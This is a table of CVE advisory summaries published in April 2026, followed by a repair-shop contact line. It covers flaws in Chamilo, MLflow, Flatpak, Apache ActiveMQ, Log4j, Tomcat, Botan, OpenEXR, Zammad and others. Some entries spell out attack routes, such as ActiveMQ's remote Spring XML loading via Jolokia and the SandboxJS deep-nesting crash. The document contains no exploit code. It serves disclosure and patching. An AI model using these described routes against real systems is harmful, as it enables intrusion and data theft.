| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the /social-network/personal-data/{userId} endpoint allows any authenticated user to access full personal data and API tokens of arbitrary users by modifying the userId parameter. This results in mass disclosure of sensitive user information and credentials, enabling a full platform data breach. This vulnerability is fixed in 2.0.0-RC.3. | 2026-04-10 | not yet calculated | CVE-2026-33703 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-27x6-c5c7-gpf5 |
| Go standard library--crypto/x509 | When verifying a certificate chain containing excluded DNS constraints, these constraints are not correctly applied to wildcard DNS SANs which use a different case than the constraint. This only affects validation of otherwise trusted certificate chains, issued by a root CA in the VerifyOptions.Roots CertPool, or in the system certificate pool. | 2026-04-08 | not yet calculated | CVE-2026-33810 | https://go.dev/cl/763763 https://go.dev/issue/78332 https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU https://pkg.go.dev/vuln/GO-2026-4866 |
| github.com/jackc/pgx/v5--github.com/jackc/pgx/v5/pgproto3 | Memory-safety vulnerability in github.com/jackc/pgx/v5. | 2026-04-07 | not yet calculated | CVE-2026-33815 | https://pkg.go.dev/vuln/GO-2026-4771 |
| github.com/jackc/pgx/v5--github.com/jackc/pgx/v5/pgproto3 | Memory-safety vulnerability in github.com/jackc/pgx/v5. | 2026-04-07 | not yet calculated | CVE-2026-33816 | https://pkg.go.dev/vuln/GO-2026-4772 |
| Mlflow--Mlflow | MLflow is vulnerable to Stored Cross-Site Scripting (XSS) caused by unsafe parsing of YAML-based MLmodel artifacts in its web interface. An authenticated attacker can upload a malicious MLmodel file containing a payload that executes when another user views the artifact in the UI. This allows actions such as session hijacking or performing operations on behalf of the victim. This issue affects MLflow versions through 3.10.1. | 2026-04-07 | not yet calculated | CVE-2026-33865 | https://github.com/mlflow/mlflow/pull/21435 https://cert.pl/en/posts/2026/04/CVE-2026-33865/ https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors |
| Mlflow--Mlflow | MLflow is vulnerable to an authorization bypass affecting the AJAX endpoint used to download saved model artifacts. Due to missing access-control validation, a user without permissions to a given experiment can directly query this endpoint and retrieve model artifacts they are not authorized to access. This issue affects MLflow versions through 3.10.1. | 2026-04-07 | not yet calculated | CVE-2026-33866 | https://github.com/mlflow/mlflow/pull/21708 https://cert.pl/en/posts/2026/04/CVE-2026-33865/ https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors |
| Apache Software Foundation--Apache OpenMeetings | Use of GET Request Method With Sensitive Query Strings vulnerability in Apache OpenMeetings. The REST login endpoint uses the HTTP GET method with username and password passed as query parameters. Please check the references regarding possible impact. This issue affects Apache OpenMeetings: from 3.1.3 before 9.0.0. Users are recommended to upgrade to version 9.0.0, which fixes the issue. | 2026-04-09 | not yet calculated | CVE-2026-34020 | https://owasp.org/www-community/vulnerabilities/Information_exposure_through_query_strings_in_url https://lists.apache.org/thread/2h3h9do5tp17xldr0nps1yjmkx4vs3db |
| flatpak--flatpak | Flatpak is a Linux application sandboxing and distribution framework. Prior to 1.16.4, the Flatpak portal accepts paths in the sandbox-expose options which can be app-controlled symlinks pointing at arbitrary paths. Flatpak run mounts the resolved host path in the sandbox. This gives apps access to all host files and can be used as a primitive to gain code execution in the host context. This vulnerability is fixed in 1.16.4. | 2026-04-07 | not yet calculated | CVE-2026-34078 | https://github.com/flatpak/flatpak/security/advisories/GHSA-cc2q-qc34-jprg |
| flatpak--flatpak | Flatpak is a Linux application sandboxing and distribution framework. Prior to 1.16.4, the caching for ld.so removes outdated cache files without properly checking that the app controlled path to the outdated cache is in the cache directory. This allows Flatpak apps to delete arbitrary files on the host. This vulnerability is fixed in 1.16.4. | 2026-04-07 | not yet calculated | CVE-2026-34079 | https://github.com/flatpak/flatpak/security/advisories/GHSA-p29x-r292-46pp |
| flatpak--xdg-dbus-proxy | xdg-dbus-proxy is a filtering proxy for D-Bus connections. Prior to 0.1.7, a policy parser vulnerability allows bypassing eavesdrop restrictions. The proxy checks for eavesdrop=true in policy rules but fails to handle eavesdrop ='true' (with a space before the equals sign) and similar cases. Clients can intercept D-Bus messages they should not have access to. This vulnerability is fixed in 0.1.7. | 2026-04-07 | not yet calculated | CVE-2026-34080 | https://github.com/flatpak/xdg-dbus-proxy/security/advisories/GHSA-vjp5-hjfm-7677 |
| Hydrosystem--Control System | Hydrosystem Control System does not enforce authorization for some directories. This allows an unauthorized attacker to read all files in these directories and even execute some of them. Critically, the attacker could run PHP scripts directly on the connected database. This issue was fixed in Hydrosystem Control System version 9.8.5. | 2026-04-09 | not yet calculated | CVE-2026-34184 | https://cert.pl/posts/2026/04/CVE-2026-4901/ https://www.hydrosystem.poznan.pl/ |
| Hydrosystem--Control System | Hydrosystem Control System is vulnerable to SQL Injection across most scripts and input parameters. Because no protections are in place, an authenticated attacker can inject arbitrary SQL commands, potentially gaining full control over the database. This issue was fixed in Hydrosystem Control System version 9.8.5. | 2026-04-09 | not yet calculated | CVE-2026-34185 | https://cert.pl/posts/2026/04/CVE-2026-4901/ https://www.hydrosystem.poznan.pl/ |
| Apache Software Foundation--Apache ActiveMQ Broker | Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.3. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue. | 2026-04-07 | not yet calculated | CVE-2026-34197 | https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt |
| nyariv--SandboxJS | SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, the @nyariv/sandboxjs parser contains unbounded recursion in the restOfExp function and the lispify/lispifyExpr call chain. An attacker can crash any Node.js process that parses untrusted input by supplying deeply nested expressions (e.g., ~2000 nested parentheses), causing a RangeError: Maximum call stack size exceeded that terminates the process. This vulnerability is fixed in 0.8.36. | 2026-04-06 | not yet calculated | CVE-2026-34211 | https://github.com/nyariv/SandboxJS/security/advisories/GHSA-8pfc-jjgw-6g26 |
| nyariv--SandboxJS | SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, a scope modification vulnerability exists in @nyariv/sandboxjs. The vulnerability allows untrusted sandboxed code to leak internal interpreter objects through the new operator, exposing sandbox scope objects in the scope hierarchy to untrusted code; an unexpected and undesired exploit. While this could allow modifying scopes inside the sandbox, code evaluation remains sandboxed and prototypes remain protected throughout the execution. This vulnerability is fixed in 0.8.36. | 2026-04-06 | not yet calculated | CVE-2026-34217 | https://github.com/nyariv/SandboxJS/security/advisories/GHSA-hg73-4w7g-q96w |
| zammad--zammad | Zammad is a web based open source helpdesk/customer support system. Prior to 7.0.1, customers in shared organizations (meaning they can see each other's tickets) could see fields which are not intended for customers, including fields not intended for them at all (e.g. priority, custom ticket attributes for internal purposes). This was the case when a customer opened a ticket from another user of the same shared organization. They are not able to modify these fields. This vulnerability is fixed in 7.0.1. | 2026-04-08 | not yet calculated | CVE-2026-34248 | https://github.com/zammad/zammad/security/advisories/GHSA-prww-84vh-w978 |
| Sonatype--Nexus Repository | A reflected cross-site scripting vulnerability exists in Sonatype Nexus Repository versions 3.0.0 through 3.90.2 that allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser through a specially crafted URL. Exploitation requires user interaction. | 2026-04-08 | not yet calculated | CVE-2026-3438 | https://help.sonatype.com/en/sonatype-nexus-repository-3-91-0-release-notes.html https://support.sonatype.com/hc/en-us/articles/50609137161363 |
| scoder--lupa | Lupa integrates the runtimes of Lua or LuaJIT2 into CPython. In 2.6 and earlier, attribute_filter is not consistently applied when attributes are accessed through built-in functions like getattr and setattr. This allows an attacker to bypass the intended restrictions and eventually achieve arbitrary code execution. | 2026-04-06 | not yet calculated | CVE-2026-34444 | https://github.com/scoder/lupa/security/advisories/GHSA-69v7-xpr6-6gjm |
| Python Software Foundation--CPython | When calling base64.b64decode() or related functions the decoding process would stop after encountering the first padded quad regardless of whether there was more information to be processed. This can lead to data being accepted which may be processed differently by other implementations. Use "validate=True" to enable stricter processing of base64 data. | 2026-04-10 | not yet calculated | CVE-2026-3446 | https://github.com/python/cpython/pull/145267 https://github.com/python/cpython/issues/145264 https://mail.python.org/archives/list/security-announce@python.org/thread/F5ZT5ICGJ6CKXVUJ34YBVY7WOZ5SHG53/ https://github.com/python/cpython/commit/1f9958f909c1b41a4ffc0b613ef8ec8fa5e7c474 https://github.com/python/cpython/commit/4561f6418a691b3e89aef0901f53fe0dfb7f7c0e https://github.com/python/cpython/commit/e31c55121620189a0d1a07b689762d8ca9c1b7fa |
| Apache Software Foundation--Apache Log4j Core | The fix for CVE-2025-68161 https://logging.apache.org/security.html#CVE-2025-68161 was incomplete: it addressed hostname verification only when enabled via the log4j2.sslVerifyHostName https://logging.apache.org/log4j/2.x/manual/systemproperties.html#log4j2.sslVerifyHostName system property, but not when configured through the verifyHostName https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName attribute of the <Ssl> element. Although the verifyHostName configuration attribute was introduced in Log4j Core 2.12.0, it was silently ignored in all versions through 2.25.3, leaving TLS connections vulnerable to interception regardless of the configured value. A network-based attacker may be able to perform a man-in-the-middle attack when all of the following conditions are met: * An SMTP, Socket, or Syslog appender is in use. * TLS is configured via a nested <Ssl> element. * The attacker can present a certificate issued by a CA trusted by the appender's configured trust store, or by the default Java trust store if none is configured. This issue does not affect users of the HTTP appender, which uses a separate verifyHostname https://logging.apache.org/log4j/2.x/manual/appenders/network.html#HttpAppender-attr-verifyHostName attribute that was not subject to this bug and verifies host names by default. Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue. | 2026-04-10 | not yet calculated | CVE-2026-34477 | https://github.com/apache/logging-log4j2/pull/4075 https://logging.apache.org/security.html#CVE-2026-34477 https://logging.apache.org/cyclonedx/vdr.xml https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName https://lists.apache.org/thread/lkx8cl46t2bvkcwfcb2pd43ygc097lq4 |
| Apache Software Foundation--Apache Log4j Core | Apache Log4j Core's Rfc5424Layout https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout , in versions 2.21.0 through 2.25.3, is vulnerable to log injection via CRLF sequences due to undocumented renames of security-relevant configuration attributes. Two distinct issues affect users of stream-based syslog services who configure Rfc5424Layout directly: * The newLineEscape attribute was silently renamed, causing newline escaping to stop working for users of TCP framing (RFC 6587), exposing them to CRLF injection in log output. * The useTlsMessageFormat attribute was silently renamed, causing users of TLS framing (RFC 5425) to be silently downgraded to unframed TCP (RFC 6587), without newline escaping. Users of the SyslogAppender are not affected, as its configuration attributes were not modified. Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue. | 2026-04-10 | not yet calculated | CVE-2026-34478 | https://github.com/apache/logging-log4j2/pull/4074 https://logging.apache.org/security.html#CVE-2026-34478 https://logging.apache.org/cyclonedx/vdr.xml https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout https://lists.apache.org/thread/3k1clr2l6vkdnl4cbhjrnt1nyjvb5gwt |
| Apache Software Foundation--Apache Log4j 1 to Log4j 2 bridge | The Log4j1XmlLayout from the Apache Log4j 1-to-Log4j 2 bridge fails to escape characters forbidden by the XML 1.0 standard, producing malformed XML output. Conforming XML parsers are required to reject documents containing such characters with a fatal error, which may cause downstream log processing systems to drop or fail to index affected records. Two groups of users are affected: * Those using Log4j1XmlLayout directly in a Log4j Core 2 configuration file. * Those using the Log4j 1 configuration compatibility layer with org.apache.log4j.xml.XMLLayout specified as the layout class. Users are advised to upgrade to Apache Log4j 1-to-Log4j 2 bridge version 2.25.4, which corrects this issue. Note: The Apache Log4j 1-to-Log4j 2 bridge is deprecated and will not be present in Log4j 3. Users are encouraged to consult the Log4j 1 to Log4j 2 migration guide https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html , and specifically the section on eliminating reliance on the bridge. | 2026-04-10 | not yet calculated | CVE-2026-34479 | https://github.com/apache/logging-log4j2/pull/4078 https://logging.apache.org/security.html#CVE-2026-34479 https://logging.apache.org/cyclonedx/vdr.xml https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html https://lists.apache.org/thread/gd0hp6mj17rn3kj279vgy4p7kd4zz5on |
| Apache Software Foundation--Apache Log4j Core | Apache Log4j Core's XmlLayout https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout , in versions up to and including 2.25.3, fails to sanitize characters forbidden by the XML 1.0 specification https://www.w3.org/TR/xml/#charsets producing invalid XML output whenever a log message or MDC value contains such characters. The impact depends on the StAX implementation in use: * JRE built-in StAX: Forbidden characters are silently written to the output, producing malformed XML. Conforming parsers must reject such documents with a fatal error, which may cause downstream log-processing systems to drop the affected records. * Alternative StAX implementations (e.g., Woodstox https://github.com/FasterXML/woodstox , a transitive dependency of the Jackson XML Dataformat module): An exception is thrown during the logging call, and the log event is never delivered to its intended appender, only to Log4j's internal status logger. Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue by sanitizing forbidden characters before XML output. | 2026-04-10 | not yet calculated | CVE-2026-34480 | https://github.com/apache/logging-log4j2/pull/4077 https://logging.apache.org/security.html#CVE-2026-34480 https://logging.apache.org/cyclonedx/vdr.xml https://logging.apache.org/log4j/2.x/manual/layouts.html#XmlLayout https://lists.apache.org/thread/5x0hcnng0chhghp6jgjdp3qmbbhfjzhb |
| Apache Software Foundation--Apache Log4j JSON Template Layout | Apache Log4j's JsonTemplateLayout https://logging.apache.org/log4j/2.x/manual/json-template-layout.html , in versions up to and including 2.25.3, produces invalid JSON output when log events contain non-finite floating-point values (NaN, Infinity, or -Infinity), which are prohibited by RFC 8259. This may cause downstream log processing systems to reject or fail to index affected records. An attacker can exploit this issue only if both of the following conditions are met: * The application uses JsonTemplateLayout. * The application logs a MapMessage containing an attacker-controlled floating-point value. Users are advised to upgrade to Apache Log4j JSON Template Layout 2.25.4, which corrects this issue. | 2026-04-10 | not yet calculated | CVE-2026-34481 | https://github.com/apache/logging-log4j2/pull/4080 https://logging.apache.org/security.html#CVE-2026-34481 https://logging.apache.org/cyclonedx/vdr.xml https://logging.apache.org/log4j/2.x/manual/json-template-layout.html https://lists.apache.org/thread/n34zdv00gbkdbzt2rx9rf5mqz6lhopcv |
| Apache Software Foundation--Apache Tomcat | Improper Encoding or Escaping of Output vulnerability in the JsonAccessLogValve component of Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.20, from 10.1.0-M1 through 10.1.53, from 9.0.40 through 9.0.116. Users are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117, which fix the issue. | 2026-04-09 | not yet calculated | CVE-2026-34483 | https://lists.apache.org/thread/j1w7304yonlr8vo1tkb5nfs7od1y228b |
| Apache Software Foundation--Apache Tomcat | Missing Encryption of Sensitive Data vulnerability in Apache Tomcat due to the fix for CVE-2026-29146 allowing the bypass of the EncryptInterceptor. This issue affects Apache Tomcat: 11.0.20, 10.1.53, 9.0.116. Users are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117, which fix the issue. | 2026-04-09 | not yet calculated | CVE-2026-34486 | https://lists.apache.org/thread/9510k5p5zdvt9pkkgtyp85mvwxo2qrly |
| Apache Software Foundation--Apache Tomcat | Insertion of Sensitive Information into Log File vulnerability in the cloud membership for clustering component of Apache Tomcat exposed the Kubernetes bearer token. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.20, from 10.1.0-M1 through 10.1.53, from 9.0.13 through 9.0.116. Users are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117, which fix the issue. | 2026-04-09 | not yet calculated | CVE-2026-34487 | https://lists.apache.org/thread/4xpkwolpkrj8v5xzp5nyovtlqp3y850h |
| Apache Software Foundation--Apache Tomcat | CLIENT_CERT authentication does not fail as expected for some scenarios when soft fail is disabled and FFM is used in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M14 through 11.0.20, from 10.1.22 through 10.1.53, from 9.0.92 through 9.0.116. Users are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117, which fixes the issue. | 2026-04-09 | not yet calculated | CVE-2026-34500 | https://lists.apache.org/thread/7rcl4zdxryc8hy3htyfyxkbqpxjtfdl2 |
| Apache Software Foundation--Apache Airflow | In Apache Airflow versions 3.0.0 through 3.1.8, the DagRun wait endpoint returns XCom result values even to users who only have DAG Run read permissions, such as the Viewer role. This behavior conflicts with the FAB RBAC model, which treats XCom as a separate protected resource, and with the security model documentation that defines the Viewer role as read-only. Airflow uses the FAB Auth Manager to manage access control on a per-resource basis. The Viewer role is intended to be read-only by default, and the security model documentation defines Viewer users as those who can inspect DAGs without accessing sensitive execution results. Users are recommended to upgrade to Apache Airflow 3.2.0, which resolves this issue. | 2026-04-09 | not yet calculated | CVE-2026-34538 | https://github.com/apache/airflow/pull/64415 https://lists.apache.org/thread/9mq3msqhmgjwdzbr6bgthj4brb3oz9fl |
| randombit--botan | Botan is a C++ cryptography library. In 3.11.0, the function Certificate_Store::certificate_known had a misleading name; it would return true if any certificate in the store had a DN (and subject key identifier, if set) matching that of the argument. It did not check that the cert it found and the cert it was passed were actually the same certificate. In 3.11.0 an extension of the path validation logic was made which assumed that certificate_known only returned true if the certificates were in fact identical. The impact is that if an end entity certificate is presented, and its DN (and subject key identifier, if set) match that of any trusted root, the end entity certificate is accepted immediately as if it itself were a trusted root. This vulnerability is fixed in 3.11.1. | 2026-04-07 | not yet calculated | CVE-2026-34580 | https://github.com/randombit/botan/security/advisories/GHSA-v782-6fq4-q827 |
| randombit--botan | Botan is a C++ cryptography library. Prior to version 3.11.1, the TLS 1.3 implementation allowed ApplicationData records to be processed prior to the Finished message being received. A server which is attempting to enforce client authentication via certificates can be bypassed by a client which entirely omits Certificate, CertificateVerify, and the Finished message and instead sends application data records. This vulnerability is fixed in 3.11.1. | 2026-04-07 | not yet calculated | CVE-2026-34582 | https://github.com/randombit/botan/security/advisories/GHSA-pxcj-9ppx-g86g |
| AcademySoftwareFoundation--openexr | OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From 3.1.0 to before 3.2.7, 3.3.9, and 3.4.9, internal_exr_undo_piz() advances the working wavelet pointer with signed 32-bit arithmetic. Because nx, ny, and wcount are int, a crafted EXR file can make this product overflow and wrap. The next channel then decodes from an incorrect address. The wavelet decode path operates in place, so this yields both out-of-bounds reads and out-of-bounds writes. This vulnerability is fixed in 3.2.7, 3.3.9, and 3.4.9. | 2026-04-06 | not yet calculated | CVE-2026-34588 | https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-588r-cr5c-w6hf https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9 |
| AcademySoftwareFoundation--openexr | OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From 3.2.0 to before 3.2.7, 3.3.9, and 3.4.9, the DWA lossy decoder constructs temporary per-component block pointers using signed 32-bit arithmetic. For a large enough width, the calculation overflows and later decoder stores operate on a wrapped pointer outside the allocated rowBlock backing store. This vulnerability is fixed in 3.2.7, 3.3.9, and 3.4.9. | 2026-04-06 | not yet calculated | CVE-2026-34589 | https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-p8xc-w3q4-h64x https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9 |
| Checkmk GmbH--Checkmk | Insufficient sanitization of dashboard dashlet title links in Checkmk 2.2.0 (EOL), Checkmk 2.3.0 before 2.3.0p46, Checkmk 2.4.0 before 2.4.0p25, and Checkmk 2.5.0 (beta) before 2.5.0b3 allows an attacker with dashboard creation privileges to perform stored cross-site scripting (XSS) attacks by tricking a victim into clicking a crafted dashlet title link on a shared dashboard. | 2026-04-07 | not yet calculated | CVE-2026-3466 | https://checkmk.com/werk/19033 https://www.vulncheck.com/advisories/checkmk-stored-cross-site-scripting-in-dashlet-title |
| zammad--zammad | Zammad is a web-based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the HTML sanitizer for ticket articles was missing proper sanitization of data: ... URI schemes, resulting in such malicious content being stored in the database of the Zammad instance. The Zammad GUI renders this content; due to the applied CSP rules, no harm was done by, e.g., clicking such a link. This vulnerability is fixed in 7.0.1 and 6.5.4. | 2026-04-08 | not yet calculated | CVE-2026-34718 | https://github.com/zammad/zammad/security/advisories/GHSA-c2cf-9fc7-jhf3 |
| zammad--zammad | Zammad is a web-based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the webhook model was missing proper validation for loopback addresses or link-local addresses; only the URL scheme (HTTP/HTTPS) and the hostname were checked. This could result in retrieving confidential metadata of cloud/hosting providers. The existing check is now extended and is applied when configuring webhooks as well as when triggering webhook jobs. This vulnerability is fixed in 7.0.1 and 6.5.4. | 2026-04-08 | not yet calculated | CVE-2026-34719 | https://github.com/zammad/zammad/security/advisories/GHSA-2vgc-vfh2-rw75 |
| zammad--zammad | Zammad is a web-based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the SSO mechanism in Zammad was not verifying that the header originates from a trusted SSO proxy/gateway before applying further actions on it. This vulnerability is fixed in 7.0.1 and 6.5.4. | 2026-04-08 | not yet calculated | CVE-2026-34720 | https://github.com/zammad/zammad/security/advisories/GHSA-hcv6-w4h9-p2p7 |
| zammad--zammad | Zammad is a web-based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the OAuth callback endpoints for Microsoft, Google, and Facebook external credentials do not validate a CSRF state parameter. This vulnerability is fixed in 7.0.1 and 6.5.4. | 2026-04-08 | not yet calculated | CVE-2026-34721 | https://github.com/zammad/zammad/security/advisories/GHSA-mfwp-hx66-626c |
| zammad--zammad | Zammad is a web-based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the endpoint used for ticket creation was missing authorization if the related parameter for adding links is used. This vulnerability is fixed in 7.0.1 and 6.5.4. | 2026-04-08 | not yet calculated | CVE-2026-34722 | https://github.com/zammad/zammad/security/advisories/GHSA-28m3-wwgv-ppw8 |
| zammad--zammad | Zammad is a web-based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, unauthenticated remote attackers were able to access the getting started endpoint and obtain sensitive internal entity data, even after the system setup was completed. This vulnerability is fixed in 7.0.1 and 6.5.4. | 2026-04-08 | not yet calculated | CVE-2026-34723 | https://github.com/zammad/zammad/security/advisories/GHSA-hcm9-ch62-5727 |
| zammad--zammad | Zammad is a web-based open source helpdesk/customer support system. Prior to 7.0.1, a server-side template injection vulnerability exists which leads to RCE via the AI Agent. Impact is limited to environments where an attacker can control or influence type_enrichment_data (typically high-privilege administrative configuration). This vulnerability is fixed in 7.0.1. | 2026-04-08 | not yet calculated | CVE-2026-34724 | https://github.com/zammad/zammad/security/advisories/GHSA-fg9w-jg8f-4j94 |
| zammad--zammad | Zammad is a web-based open source helpdesk/customer support system. Prior to 7.0.1 and 6.5.4, the REST endpoint POST /api/v1/ai_assistance/text_tools/:id was not checking whether a user is privileged to use the text tool, so it could be used in all situations. This vulnerability is fixed in 7.0.1 and 6.5.4. | 2026-04-08 | not yet calculated | CVE-2026-34782 | https://github.com/zammad/zammad/security/advisories/GHSA-96r7-29c8-2j7q |
| zammad--zammad | Zammad is a web-based open source helpdesk/customer support system. Prior to 7.0.1, the REST endpoint POST /api/v1/ai_assistance/text_tools/:id contains an authorization failure. Context data (e.g., a group or organization) supplied for use in the AI prompt was not checked to confirm it is accessible to the current user. This leads to data being present in the AI prompt that was not authorized before being used. A user needs to have the ticket.agent permission to be able to use the provided context data. This vulnerability is fixed in 7.0.1. | 2026-04-08 | not yet calculated | CVE-2026-34837 | https://github.com/zammad/zammad/security/advisories/GHSA-89vv-6639-wcv8 |
Contact us now: fix@hk-computer-repair.com
Useful links: